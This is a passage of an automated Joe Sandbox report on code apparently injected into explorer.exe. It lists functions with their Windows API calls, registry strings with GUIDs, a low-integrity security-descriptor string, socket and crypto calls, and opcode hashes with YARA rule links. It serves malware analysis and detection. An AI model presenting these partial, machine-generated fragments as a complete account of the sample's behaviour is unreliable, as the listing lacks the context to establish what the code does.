                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenValue_errno_invalid_parameter_noinfo
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 2168760479-3800169908
                                                                            • Opcode ID: 3cdd55925c1ca3863a7a95fb6f7a148d8170fcccd79d4e5565ab79c8fd82264d
                                                                            • Instruction ID: 6023b1580fc0d7d199f8d586ed65fa647fd72ffeb811ac039e6f1cd90850685c
                                                                            • Opcode Fuzzy Hash: 3cdd55925c1ca3863a7a95fb6f7a148d8170fcccd79d4e5565ab79c8fd82264d
                                                                            • Instruction Fuzzy Hash: ED115275724A8196E750EF25F854B9A73B0FBC5744F900621A69E83BA8DF7CC908CB80
                                                                            Function 00BE7770 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registrymemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00BE778A
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegGetValueW.KERNEL32 ref: 00BE77FC
                                                                            • LocalFree.KERNEL32 ref: 00BE7820
                                                                            Strings
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 00BE77E9
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 00BE77A1
                                                                            • SOFTWARE\%s, xrefs: 00BE77A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocFreeValue_errno_invalid_parameter_noinfo
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3172112264-923683513
                                                                            • Opcode ID: 7bdd416015261c9b4f707f745f03a9e336c444ff69961788039da5d2f607619d
                                                                            • Instruction ID: 6e967dfd881ee59af748ccac978302387cc090421c3c0f54d1652109497b5059
                                                                            • Opcode Fuzzy Hash: 7bdd416015261c9b4f707f745f03a9e336c444ff69961788039da5d2f607619d
                                                                            • Instruction Fuzzy Hash: 71111731218B8082EB50DB65F45879EB3B0F786754FA00625E78D83BA8DF7DC94ACB40
                                                                            Function 00BFE280 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00BFE2C7
                                                                            • GetSecurityDescriptorSacl.ADVAPI32 ref: 00BFE2E5
                                                                            • SetNamedSecurityInfoW.ADVAPI32 ref: 00BFE31E
                                                                            • LocalFree.KERNEL32 ref: 00BFE32D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                            • API String ID: 173816248-495562761
                                                                            • Opcode ID: 79cb27a41e6bf29be1783338148c5806ad86ba6a150287ac79480d04f9847149
                                                                            • Instruction ID: 2ce4c051c003af9a82c327d9dab7fc8d0ed9084b1b5189e6dba04fcd73208d08
                                                                            • Opcode Fuzzy Hash: 79cb27a41e6bf29be1783338148c5806ad86ba6a150287ac79480d04f9847149
                                                                            • Instruction Fuzzy Hash: 7B11C572608A8182E7109F50F868B5FB7B0F3C5B95F604116E7C947AA8CFBEC549CB40
                                                                            Function 00BE8EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 25registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegGetValueW.KERNEL32 ref: 00BE8F1A
                                                                            Strings
                                                                            • SOFTWARE\%s, xrefs: 00BE8EC3
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 00BE8EBC
                                                                            • {BC63A593-23AA-4808-8FB5-F192F2F6D1F9}, xrefs: 00BE8F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Value_errno_invalid_parameter_noinfo
                                                                            • String ID: SOFTWARE\%s${BC63A593-23AA-4808-8FB5-F192F2F6D1F9}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 4005939669-1712169463
                                                                            • Opcode ID: 8193e818a9aa16c9e68eee80bca12f6b7fe7f8da997b6d7c19b3560e29706ec1
                                                                            • Instruction ID: 1232451dacc31b329bddb0861306bdbee209d985e35984b5b03d97d0752c75ab
                                                                            • Opcode Fuzzy Hash: 8193e818a9aa16c9e68eee80bca12f6b7fe7f8da997b6d7c19b3560e29706ec1
                                                                            • Instruction Fuzzy Hash: 8BF01D31218B8592FB60DB61F44479A73A4F785354F900222E69C427E8DFBDC249CB84
                                                                            Function 00C06853 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                                                                            • String ID:
                                                                            • API String ID: 3044467104-0
                                                                            • Opcode ID: af6db72d22a5a0b57c07039f707cf0efc0dc65c97e2bfbca397b748c9bcfdb65
                                                                            • Instruction ID: 890211ddff7ee370379fadcbc4d58883d066c1ce6d64d957ddcca97e478cd3d0
                                                                            • Opcode Fuzzy Hash: af6db72d22a5a0b57c07039f707cf0efc0dc65c97e2bfbca397b748c9bcfdb65
                                                                            • Instruction Fuzzy Hash: 2021EA32119A80C6E7329F18E498BDAB3B0F38C749F240215D2CA82A98CF7EC458CF00
                                                                            Function 00C06444 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                            • String ID:
                                                                            • API String ID: 785092289-0
                                                                            • Opcode ID: 8f4642ff7b1716d754dccb156afb2504e9903691b47701658c058a50519b7d20
                                                                            • Instruction ID: 872aa9d9bc9ffac591d046cba13ee89fb6b03dae627686f1daf904fea654031e
                                                                            • Opcode Fuzzy Hash: 8f4642ff7b1716d754dccb156afb2504e9903691b47701658c058a50519b7d20
                                                                            • Instruction Fuzzy Hash: CD21B832159A80C6E732DF18E499BDAB3B1F3DC749F240215D6CA92A98CF7EC455CE00
                                                                            Function 00BE4670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegGetValueW.KERNEL32 ref: 00BE46E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Value_errno_invalid_parameter_noinfo
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 4005939669-3800169908
                                                                            • Opcode ID: 735573c26684cb50b31dd168d9d8a56d2556d2f01e4cb029fd3cf547ae56ac09
                                                                            • Instruction ID: 25eeec08ba8d74abb2dc426664f60c48a02ff63a34afe49817466355581d44ab
                                                                            • Opcode Fuzzy Hash: 735573c26684cb50b31dd168d9d8a56d2556d2f01e4cb029fd3cf547ae56ac09
                                                                            • Instruction Fuzzy Hash: F5011975618B8186EB60DF64F49478E73A4F785340F904222E6CC42BA8DF7CC549CB80
                                                                            Function 00BE4AF4 Relevance: 4.6, APIs: 3, Instructions: 90synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32 ref: 00BE4880
                                                                              • Part of subcall function 00BE4DA0: SHGetKnownFolderPath.SHELL32 ref: 00BE4E23
                                                                            • LocalFree.KERNELBASE ref: 00BE4BF3
                                                                              • Part of subcall function 00BE4710: RegOpenKeyW.ADVAPI32 ref: 00BE474E
                                                                            • LocalFree.KERNEL32 ref: 00BE4C72
                                                                            • WaitForSingleObject.KERNEL32 ref: 00BE4CC6
                                                                            • LocalFree.KERNEL32 ref: 00BE4D45
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$FolderKnownObjectOpenPathSingleWait
                                                                            • String ID:
                                                                            • API String ID: 423962919-0
                                                                            • Opcode ID: 86a66c496532395c50701363ab02f81bfb15527b981d2ba53304625b2c98b4e8
                                                                            • Instruction ID: 3ee4c79b33263abc9ef1f01aceecdf3a5292b2ab11c46cecbe172d7171fcea2e
                                                                            • Opcode Fuzzy Hash: 86a66c496532395c50701363ab02f81bfb15527b981d2ba53304625b2c98b4e8
                                                                            • Instruction Fuzzy Hash: 0E511436206B80C2FB24CF08F4E57A9A3A0F7E4704F51066AD64E8A7A8DFBCC545CB51
                                                                            Function 00C06893 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 1073023652-0
                                                                            • Opcode ID: 43dddbbfbda7011b3d8a65e8c8dbcf4d13a1a20bd968318ee48078ba41f9be42
                                                                            • Instruction ID: dcb639a29c5f6309414e4ae5ccf54e3c3365d1bdf8004c92219e97eee209a3ad
                                                                            • Opcode Fuzzy Hash: 43dddbbfbda7011b3d8a65e8c8dbcf4d13a1a20bd968318ee48078ba41f9be42
                                                                            • Instruction Fuzzy Hash: 3B11593215AA80C6E7329F18E499BDAB370F79C759F240215D6C656A98CF7EC455CB00
                                                                            Function 00C0681A Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 1073023652-0
                                                                            • Opcode ID: 235f50aebb46bc464f7ab05e66ccd8ccd191cfa8eb97216690ab7208fa9ce6f8
                                                                            • Instruction ID: dcb639a29c5f6309414e4ae5ccf54e3c3365d1bdf8004c92219e97eee209a3ad
                                                                            • Opcode Fuzzy Hash: 235f50aebb46bc464f7ab05e66ccd8ccd191cfa8eb97216690ab7208fa9ce6f8
                                                                            • Instruction Fuzzy Hash: 3B11593215AA80C6E7329F18E499BDAB370F79C759F240215D6C656A98CF7EC455CB00
                                                                            Function 00C06BA4 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 1073023652-0
                                                                            • Opcode ID: cb8934eb4f7bc3a0db0905c1e506579420ed85087974290e892497e4c38a9e4d
                                                                            • Instruction ID: dcb639a29c5f6309414e4ae5ccf54e3c3365d1bdf8004c92219e97eee209a3ad
                                                                            • Opcode Fuzzy Hash: cb8934eb4f7bc3a0db0905c1e506579420ed85087974290e892497e4c38a9e4d
                                                                            • Instruction Fuzzy Hash: 3B11593215AA80C6E7329F18E499BDAB370F79C759F240215D6C656A98CF7EC455CB00
                                                                            Function 00C06487 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 1073023652-0
                                                                            • Opcode ID: d07affa4af74ba9c6dc041e1d220e6f0941e94259047affa75eb072f7aa2d55e
                                                                            • Instruction ID: dcb639a29c5f6309414e4ae5ccf54e3c3365d1bdf8004c92219e97eee209a3ad
                                                                            • Opcode Fuzzy Hash: d07affa4af74ba9c6dc041e1d220e6f0941e94259047affa75eb072f7aa2d55e
                                                                            • Instruction Fuzzy Hash: 3B11593215AA80C6E7329F18E499BDAB370F79C759F240215D6C656A98CF7EC455CB00
                                                                            Function 00C0F5AC Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$CreateInformationVersion
                                                                            • String ID:
                                                                            • API String ID: 3563531100-0
                                                                            • Opcode ID: e4348b458ff4f1f976adb9bc2e523157a452458e613d1e976ec5d4266348eb62
                                                                            • Instruction ID: a67123531e039f44f193631b59e20b1da73c7fb264679a6f6d3cfec1a87873e5
                                                                            • Opcode Fuzzy Hash: e4348b458ff4f1f976adb9bc2e523157a452458e613d1e976ec5d4266348eb62
                                                                            • Instruction Fuzzy Hash: FDE0DF74215A9082FB955B14E859F993220F789741FD00128E90A02BA4DF3CC08EC704
                                                                            Function 00BF2160 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BF218F
                                                                            • GetVolumeInformationW.KERNEL32 ref: 00BF21E0
                                                                              • Part of subcall function 00BFDAD0: CryptAcquireContextW.ADVAPI32 ref: 00BFDB1E
                                                                              • Part of subcall function 00BFDAD0: CryptCreateHash.ADVAPI32 ref: 00BFDB47
                                                                              • Part of subcall function 00BFDAD0: WaitForSingleObject.KERNEL32 ref: 00BFDBB5
                                                                              • Part of subcall function 00BFDAD0: CryptReleaseContext.ADVAPI32 ref: 00BFDCA2
                                                                              • Part of subcall function 00BFDAD0: CryptDestroyHash.ADVAPI32 ref: 00BFDCB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
